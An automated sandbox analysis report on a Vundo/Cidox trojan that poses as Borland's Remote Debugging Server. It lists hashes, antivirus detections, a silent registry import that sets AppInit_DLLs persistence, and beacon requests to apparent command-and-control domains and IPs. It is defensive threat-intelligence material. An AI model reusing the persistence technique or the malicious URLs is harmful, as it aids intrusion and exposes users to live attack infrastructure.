Analysis Date: 2014-07-04 07:30:41
MD5: 1c90be658817d0b58bfacc4cecefb2c2
SHA1: b6fe75ff5176750672c7b105e7662def49455f21

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: f812075038dcea3fea928afb8fe5d286 sha1: 6ae144e4a6992d2252eaa92fb467f5ba34afd336 size: 90112
Section _ASM2: md5: a80f77ff2323f1a1f6e00e50e44288f7 sha1: 1eebe4b8cbda59abdf9ef3a9458678f53d3a1ba9 size: 62464
Section .rdata: md5: 7557c2785132c407c82bdf0babb3180f sha1: 9720161578a93a15a4d12ecb5c81a559a55d22d6 size: 8192
Section .data: md5: 1fb1c2845ee4fbd124ccb38a80ae6f42 sha1: 4acbaf6c98dab388417c5670a2ef793fc678104c size: 5120
Section .tls: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc: md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp: 2012-09-17 13:32:27
Version:
  LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
  InternalName: BORDBG61
  FileVersion: 70.08.08.1442
  CompanyName: Borland Software Corporation
  ProductName: Borland Remote Debugging Server
  ProductVersion: 51.00
  FileDescription: Borland Remote Debugging Server
  OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: ca671bb93c526fd66343d82a84d1ea904cdf3dcf
IMPhash: 5b5fe4d280f8f7ea0aa9aa05e3974812
AV 360 Safe: Gen:Variant.Spy.5
AV Ad-Aware: Gen:Variant.Spy.5
AV Alwil (avast): Hioles-H [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Vundo.Gen8
AV CA (E-Trust Ino): Win32/Vundo.ZAGA!suspicious
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: no_virus
AV Dr. Web: Trojan.Mayachok.17758
AV Emsisoft: Gen:Variant.Symmi.1446
AV Eset (nod32): Win32/Citirevo.AD
AV Fortinet: W32/Citirevo.AB!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Variant.Spy.5
AV Grisoft (avg): Agent3.CCBM
AV Ikarus: Trojan-Downloader.Win32.Vundo
AV K7: Backdoor ( 04c4f2bf1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Agent
AV Mcafee: Vundo-FASV!1C90BE658817
AV Microsoft Security Essentials: TrojanDownloader:Win32/Vundo.J
AV MicroWorld (escan): Gen:Variant.Symmi.1446
AV Norman: winpe/Vundo.CRFL
AV Rising: Trojan.Win32.Generic.1350CF3A
AV Sophos: Mal/Vundo-M
AV Symantec: Trojan.Gen.2
AV Trend Micro: TROJ_VUNDO.SMKK
AV VirusBlokAda (vba32): Backdoor.Cidox

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\jozhsii.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: gleospond.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\jozhsii.dll\\x00

Network Details:

DNS getavodes.com (A): 208.73.211.242, 208.73.211.163, 208.73.211.174, 208.73.211.175, 208.73.211.193
DNS tryatdns.com (A): 208.73.210.219, 208.73.211.174, 208.73.211.233, 208.73.211.235, 208.73.211.246
DNS fescheck.com (A): 208.73.210.205, 208.73.211.173, 208.73.211.246, 208.73.211.249, 208.73.210.203
DNS instrango.com (A): 91.237.88.245
DNS nsknock.com (A): 208.73.211.246, 208.73.210.219, 208.73.211.174, 208.73.211.233, 208.73.211.235
DNS tegimode.com (A): 208.73.211.249, 208.73.210.203, 208.73.210.205, 208.73.211.173, 208.73.211.246
DNS denadb.com (A): 208.73.211.163, 208.73.211.174, 208.73.211.175, 208.73.211.193, 208.73.211.242
DNS foradns.com (A): 208.73.210.205, 208.73.211.173, 208.73.211.246, 208.73.211.249, 208.73.210.203
DNS nshouse1.com (A): 208.73.211.246, 208.73.210.219, 208.73.211.174, 208.73.211.233, 208.73.211.235
DNS gleospond.com (A): no address recorded
DNS netrovad.com (A): no address recorded
DNS terrans.su (A): no address recorded
DNS clickstano.com (A): no address recorded
DNS denareclick.com (A): no address recorded
DNS clickbeta.ru (A): no address recorded
DNS clickclans.ru (A): no address recorded
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF9ihf1Fd8UQh
  User-Agent: (empty)
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF69i4CVtlug5
  User-Agent: (empty)
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF4d7930D+uMl
  User-Agent: (empty)
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF5qfLN0ZP3fL
  User-Agent: (empty)
HTTP GET: http://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF+gH+SPVnumD
  User-Agent: (empty)
HTTP GET: http://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF5JtjZ94nFNp
  User-Agent: (empty)
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF52QGZo6iXkK
  User-Agent: (empty)
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF44kXlcYDWpI
  User-Agent: (empty)
HTTP GET: http://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF2lLRLGWBCrQ
  User-Agent: (empty)
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=398&av=0&vm=0&al=0&p=707&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg5UibaVpVddjp1PwCI9/hhA728/MP00jF6fOFyofuteT
  User-Agent: (empty)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.242:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.210.219:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.210.205:80
Flows TCP: 192.168.1.1:1034 ➝ 91.237.88.245:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.249:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.163:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.210.205:80
Flows TCP: 192.168.1.1:1039 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap

Strings